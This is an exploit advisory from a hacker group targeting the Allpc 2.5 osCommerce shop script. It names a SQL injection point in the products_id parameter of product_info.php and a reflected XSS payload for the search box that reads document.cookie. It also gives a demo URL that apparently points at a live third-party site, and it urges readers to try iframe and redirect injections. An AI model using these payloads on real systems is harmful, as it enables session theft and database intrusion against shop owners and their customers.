[+]Title Allpc 2.5 osCommerce SQL-i/XSS Multiple Vulnerabilities
[+]Author **RoAd_KiLlEr**
[+]Contact RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[+]Tested on Win Xp Sp 2/3
---------------------------------------------------------------------------
[~] Founded by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Version: 2.5
[~] Vendor: http://www.allpcscript.com
==========ExPl0iT3d by **RoAd_KiLlEr**==========
[+]Description:
Compatible with all versions of PHP 4 and above.
It uses a database MySQL.
It works in 4 languages, which are easily replaced in the administration panel.
* Appearance:
- The client part
- Administration
* Install / Installation
- Simple automatic installation via the web-browser
* Design / Placement
- A simple change of patterns
- Support for dynamic images
* Administration / Functional
- Supports unlimited products and categories
The structure of products in categories
The structure of the categories to the categories
- Add / edit / delete categories, products, manufacturers, customers, and reviews
- Support for physical (shippable) and virtual (zagruzhaemye) products
- Land Administration is protected with username and password
- Contact customers directly via email or contact the user
- Easy to book and restore the database
- Print invoices and packaging lists from the order
- Statistics for products and customers
- Multilingual support
- Support the use of multiple currencies
- Automatic exchange rates
- Select what to display, and in what order the product that make the list page
- Support for static and dynamic banners with full statistics
=========================================
[+]. SQL-i Vulnerability
=+=+=+=+=+=+=+=+=+
[P0C]: http://127.0.0.1/allpc25free/product_info.php?products_id=[SQL Injection]
[DemO]: http://127.0.0.1/allpc25free/product_info.php?products_id=[SQL Injection]
[+]. XSS Vulnerability
=+=+=+=+=+=+=+=+=
The Search B0x of this script is vulnerable to XSS,because it fails to properly sanitize the response.
By submitting a malicious input to the web site, the user would only be able to compromise their security.That is their own browser cookies, cache objects, and so forth.
[DemO]: http://neways4u.com/advanced_search_result.php?keywords=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
[Atack Pattern]: "><script>alert(document.cookie)</script>
I used this pattern to show you that is vulnerable,but you can try HTML Injection,Url Redirect, Iframe,Etc.. Basically Your own Imagination is your Limit..
Good Luck :P
===========================================================================================
[!] Albanian Hacking Crew
===========================================================================================
[!] **RoAd_KiLlEr**
===========================================================================================
[!] MaiL: sukihack[at]gmail[dot]com
===========================================================================================
[!] Greetz To : Ton![w]indowS | X-n3t | b4cKd00r ~ | The|DennY` | EaglE EyE | THE_1NV1S1BL3 & All Albanian/Kosova Hackers
===========================================================================================
[!] Spec Th4nks: r0073r | indoushka | Sid3^effects| L0rd CruSad3r | SONIC | MaFFiTeRRoR | All Inj3ct0r.com Members | And All My Friendz
===========================================================================================
[!] Red n'black i dress eagle on my chest
It's good to be an ALBANIAN
Keep my head up high for that flag I die
Im proud to be an ALBANIAN
===========================================================================================
